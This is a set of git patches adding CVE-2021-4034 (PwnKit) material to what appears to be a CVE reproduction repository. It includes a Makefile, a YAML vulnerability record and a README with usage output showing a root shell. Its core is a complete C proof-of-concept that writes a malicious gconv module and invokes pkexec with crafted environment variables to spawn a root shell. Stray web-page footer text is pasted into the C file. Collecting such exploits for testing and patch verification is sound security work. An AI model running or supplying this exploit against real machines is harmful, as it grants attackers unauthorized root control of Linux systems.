From e5d4008abd5f05a30fab4c7b8191f8a54950dcf6 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:07:51 +0000
Subject: [PATCH 1/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-4034?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/linux-kernel/2021/CVE-2021-4034/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/.keep

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/.keep b/cve/linux-kernel/2021/CVE-2021-4034/.keep
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From a0a6e61e75a3e171f6fda5ead83da33d03d5bfcf Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:08:21 +0000
Subject: [PATCH 2/9] add cve/linux-kernel/2021/CVE-2021-4034.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/README.md

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
new file mode 100644
index 00000000..e69de29b
-- 
Gitee


From 09d1b473eafe92de4c9d72d59679950c6f930477 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:10:14 +0000
Subject: [PATCH 3/9] add cve/linux-kernel/2021/CVE-2021-4034.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
-- 
Gitee


From db622b000fd41c55c0ef6edb035b67c8484def73 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:11:19 +0000
Subject: [PATCH 4/9] add cve/linux-kernel/2021/CVE-2021-4034/Makefile.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 cve/linux-kernel/2021/CVE-2021-4034/Makefile | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/Makefile

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/Makefile b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
new file mode 100644
index 00000000..6037d3b5
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/Makefile
@@ -0,0 +1,14 @@
+CC = gcc
+
+EFLAGS = -Wall -Wextra -O2 -g -D_GNU_SOURCE
+SFLAGS = --shared -fPIC 
+
+TARGET=exploit
+INCLUDE= include
+SOURCE= src
+
+all:
+	$(CC) $(SOURCE)/$(TARGET).c -o $(TARGET) $(EFLAGS) -I $(INCLUDE) 
+	$(CC) $(SOURCE)/$(TARGET)-so.c -o $(TARGET).so $(EFLAGS) $(SFLAGS) -I $(INCLUDE) 
+clean: 
+	$(RM) -rf .sus $(TARGET)* GCONV_PATH=.
\ No newline at end of file
-- 
Gitee


From 880038b581cf7686ee8458acdc2a4f418edec8d7 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:12:09 +0000
Subject: [PATCH 5/9] add
 cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 .../2021/CVE-2021-4034/cve-2021-4034-poc.c    | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
new file mode 100644
index 00000000..6a5112bb
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-4034/cve-2021-4034-poc.c
@@ -0,0 +1,37 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+char *shell = 
+	"#include <stdio.h>\n"
+	"#include <stdlib.h>\n"
+	"#include <unistd.h>\n\n"
+	"void gconv() {}\n"
+	"void gconv_init() {\n"
+	"	setuid(0); setgid(0);\n"
+	"	seteuid(0); setegid(0);\n"
+	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+	"	exit(0);\n"
+	"}";
+
+int main(int argc, char *argv[]) {
+	FILE *fp;
+	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+	fp = fopen("pwnkit/pwnkit.c", "w");
+	fprintf(fp, "%s", shell);
+	fclose(fp);
+	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}
+Footer
+© 2023 GitHub, Inc.
+Footer navigation
+Terms
+Privacy
+Security
-- 
Gitee


From 0dd0879ef402653a12e716180889448424d2a3ce Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:21:42 +0000
Subject: [PATCH 6/9] add cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml

diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
new file mode 100644
index 00000000..0c23bdc6
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4034.yaml
@@ -0,0 +1,17 @@
+id: CVE-2021-4034
+source: https://github.com/Anonymous-Family/CVE-2021-4034
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    Linux Linux, A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
+  reference:
+    - https://www.anquanke.com/post/id/267774#h2-1
+    - https://nvd.nist.gov/vuln/detail/cve-2021-4034
+    - https://github.com/Anonymous-Family/CVE-2021-4034/
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-4034
+    cwe-id: CWE-125
+  tags: cve2021,权限提升
\ No newline at end of file
-- 
Gitee


From 65cecf3df5194e2b4b72664ddc96710ba5917c66 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:22:54 +0000
Subject: [PATCH 7/9] update openkylin_list.yaml.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index caeacc6e..23533074 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -31,6 +31,7 @@ cve:
   Influx-DB:
     - CVE-2019-20933
   linux-kernel:
+    - CVE-2021-4034
     - CVE-2021-4204
     - CVE-2021-22555
     - CVE-2021-4154
-- 
Gitee


From b11302887dd55d7a02b4daed118b2ee37ebc9517 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:26:04 +0000
Subject: [PATCH 8/9] update cve/linux-kernel/2021/CVE-2021-4034/README.md.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
index e69de29b..b962cc91 100644
--- a/cve/linux-kernel/2021/CVE-2021-4034/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -0,0 +1,18 @@
+linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.
+
+
+Usage
+
+$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
+$ cd CVE-2021-4034
+$ make
+[!] CVE-2021-4034 Exploit By whokilleddb
+[!] Initializing Setup
+[+] Setup Done :D
+[!] Setting Root Privileges
+[!] Launching Root Shell
+# /bin/whoami
+root
+
+ref:https://github.com/Anonymous-Family/CVE-2021-4034
+
-- 
Gitee


From c229927a19fa50b759bac2662243787dee074b58 Mon Sep 17 00:00:00 2001
From: caicaineng <cainengfu@buaa.edu.cn>
Date: Thu, 16 Mar 2023 12:26:51 +0000
Subject: [PATCH 9/9] update cve/linux-kernel/2021/CVE-2021-4034/README.md.

Signed-off-by: caicaineng <cainengfu@buaa.edu.cn>
---
 cve/linux-kernel/2021/CVE-2021-4034/README.md | 14 --------------
 1 file changed, 14 deletions(-)

diff --git a/cve/linux-kernel/2021/CVE-2021-4034/README.md b/cve/linux-kernel/2021/CVE-2021-4034/README.md
index b962cc91..3ad5c256 100644
--- a/cve/linux-kernel/2021/CVE-2021-4034/README.md
+++ b/cve/linux-kernel/2021/CVE-2021-4034/README.md
@@ -1,18 +1,4 @@
 linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.
 
-
-Usage
-
-$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
-$ cd CVE-2021-4034
-$ make
-[!] CVE-2021-4034 Exploit By whokilleddb
-[!] Initializing Setup
-[+] Setup Done :D
-[!] Setting Root Privileges
-[!] Launching Root Shell
-# /bin/whoami
-root
-
 ref:https://github.com/Anonymous-Family/CVE-2021-4034
 
-- 
Gitee